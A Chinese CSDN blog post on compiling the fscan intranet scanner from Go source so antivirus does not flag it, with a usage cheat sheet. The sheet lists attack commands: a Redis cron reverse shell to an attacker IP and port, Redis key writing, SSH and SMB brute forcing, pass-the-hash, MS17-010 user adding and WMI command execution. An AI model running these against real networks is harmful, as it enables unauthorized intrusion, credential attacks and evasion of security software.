go编译安全工具_fscan

最新推荐文章于 2024-07-09 17:25:33 发布
最新推荐文章于 2024-07-09 17:25:33 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 内网安全 文章标签: golang 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41690468/article/details/130671929
版权
fscan是一个Go语言编写的网络扫描工具,用于检测目标主机的漏洞。用户可以自行编译以避免下载报毒。该工具支持多种扫描模式,如B段扫描、SSH爆破、SMB密码碰撞等,还能配置HTTP代理和使用代理进行扫描。它还包含了特定模块的功能,如ms17010,以及命令执行和文件导入功能。
摘要由CSDN通过智能技术生成

go编译安全工具_fscan


下载


在这里插入图片描述

安装

解压进入需要编译的文件目录下
运行下面命令

go build -ldflags="-s -w"

ps: 由于会去go服务器下载一些库国内有可能无法下载

在这里插入图片描述

解决办法:

go env -w GOPROXY=https://goproxy.io,direct
go env -w GO111MODULE=off

输入查看环境是否变更
go env

后续直接再次运行编译,成功编译

演示

直接下载的报毒

在这里插入图片描述


自己编译

直接编译可以直接运行不会报毒
在这里插入图片描述

fscan 用法

基础用法

fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
fscan.exe -h 192.168.1.1/16  (B段扫描)

进阶用法

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)

参考文章

https://github.com/shadow1ng/fscan

菜鸡学安全
关注
专栏目录
[渗透教程]-023-fscan内网综合扫描工具
学-> 思->用
03-06 509
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
kali安装fscan
junjun_1902的博客
11-09 3425
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
GoHackTools:Go语言开发安全工具
02-12
GoHack工具 记录一些自己使用Go语言开发安全工具。项目会不定期更新。本人不会添加任何后门程序,程序不会对系统产生任何破坏,请各位老师傅放心使用。但本人太菜,代码写的太烂,所有程序均不会开源。仅维护Windows平台。 本项目创造于2020年10月24日,最近的一次更新时间2021年2月4日。 ################################################ ### 20210204-批量识别Druid资产#isDruid.exe 20201024-VMware任意文件读取入侵#vmware.exe 20201024-批量识别Weblogic资产#isweblogic.exe 20201024-批量识别Thinkphp资产#isthinkphp.exe 20201024-批量识别Shiro资产#isshiro.exe
Go-firehttp一个专门用于开发安全工具的HTTP类库.
08-14
header、params、body 均支持string和map定义, 太方便了. 可以获取到HTTP请求/响应的原始HTTP报文. 使用起来,真心简单. 尽量用优雅的编程方式,让go代码读起来不那么丑陋.
fscan】Windows环境下的fscan安装与使用指南
最新发布
u012153104的博客
07-09 3474
作为一个全面的内网安全扫描工具Fscan不仅能够提升网络安全专家和系统管理员的工作效率,还能够增强内网的安全防护能力。正确使用Fscan,可以有效地识别和修复网络安全漏洞,保障网络环境的安全稳定。
内网杀手 fscan 魔改汉化版!
Liyu_6618的博客
03-25 1178
汉化内网杀手fscan
fscan:一键自动化、全方位漏洞扫描的开源工具
mingyqf的博客
11-27 2680
开源前哨 简介 fscan 是一个内网综合扫描工具,方便一键自动化、全方位漏洞扫描。 它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 源码链接:https://github.com/shadow1ng/fscan 主要功能 1.信息搜集: 存活探测(icmp) 端口扫描 2.爆破功能: 各类服务爆破(ssh、smb等) 数据库密码爆破(mysql、mssq
kali-fscan+go环境安装教程
f1a9的博客
07-20 1155
在kali安装内网综合扫描工具fscan+go语言环境安装
fscan扫描工具安装
u014302772的博客
08-18 6582
fscan扫描工具安装
【win10下安装Fscan】
灰羽的博客
02-23 4355
初次安装fscan踩过的一些坑,记录下来
fscan安装以及使用
h1825819493的博客
06-26 7904
下载msi版本,直接安装就可以不用配置环境变量,默认是帮你安装配合好的使用默认配置的话,下载速度过慢,导致无法完成编译。故需要配置代理。在cmd命令行中输入代码以上两条代码都要输入。输入完成以后就可以了。接下来就是生成fscan.exe可执行文件了。没配置环境的报错状态图。
kali&Ubuntu安装fscan过程,以及遇到的一些问题
weixin_51170613的博客
02-16 3029
kali&Ubuntu安装go环境,安装fscan漏洞扫描工具
Windows10环境下安装FSCAN
a56484的博客
10-10 9956
保姆级教学如何windows下安装并使用fscan内网扫描神器。
一个简单好用的内网渗透免杀工具【免杀 fscan,mimikatz,frp 等】
资深程序员,曾自学JAVA,C#,如今从业于网安行业
01-02 1555
一个简单内网渗透工具免杀 目前免杀fscan、mimikatz、frp、elevationstation、bypassuac、 一键killAV。请使用In-Swor(x64版本),360报毒qvm20请更换exe图标资源。
Golang笔记:使用exec包执行外部程序与Shell命令
Naisu的各种笔记
05-11 2562
程序中执行外部程序是比较常用的功能,Golang执行外部程序可以使用标准库中的 `os/exec` [https://pkg.go.dev/os/exec](https://pkg.go.dev/os/exec) 。这个包默认是用来执行外部程序的,可以通过调用Shell程序来执行Shell命令。这篇文章将对相关使用做个记录,方便自己查阅。
一个简单好用的内网渗透免杀工具,可免杀 fscan,mimikatz,frp 等等。
logic1001的博客
12-29 1708
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
win10编译golang程序报病毒错误
u_say2what的博客
12-07 1676
错误为command-line-arguments: open C:\Users\ADMINI~1\AppData\Local\Temp\go-build435947867\b001\exe\a.out.exe: Operation did not complete successfully because the file contains a virus or potentially unwanted software.解决办法,将Local/Temp目录添加到病毒排除项即可。
fscan_darwin
08-09
fscan_darwin是一个在达尔文操作系统上运行的扫描程序。达尔文是由苹果公司开发的开源操作系统,它是基于UNIX的,主要用于苹果的Mac电脑和移动设备。 fscan_darwin的主要功能是对达尔文系统进行扫描和检测。它可以检测系统中的安全漏洞、恶意软件和其他潜在的威胁。它通过扫描操作系统文件、进程、注册表和其他关键系统组件来发现潜在的问题。它还可以检查系统中的网络连接和端口开放情况,以及系统配置的安全性。 fscan_darwin还具有实时监控功能,可以持续监测系统的安全状态并提供警报。它可以自动更新自身的安全数据库和扫描规则,以保持对新的威胁和漏洞的检测能力。 此外,fscan_darwin还具有日志记录和报告生成功能。它可以生成详细的扫描报告,包括检测到的威胁、漏洞和建议的解决方法。这些报告可以用于系统管理员和安全专家进行进一步的分析和处理。 总之,fscan_darwin是一个在达尔文操作系统上运行的强大扫描程序,旨在保护系统免受安全威胁。通过对系统进行全面的扫描和检测,它能够及时发现和解决潜在的问题,提高系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值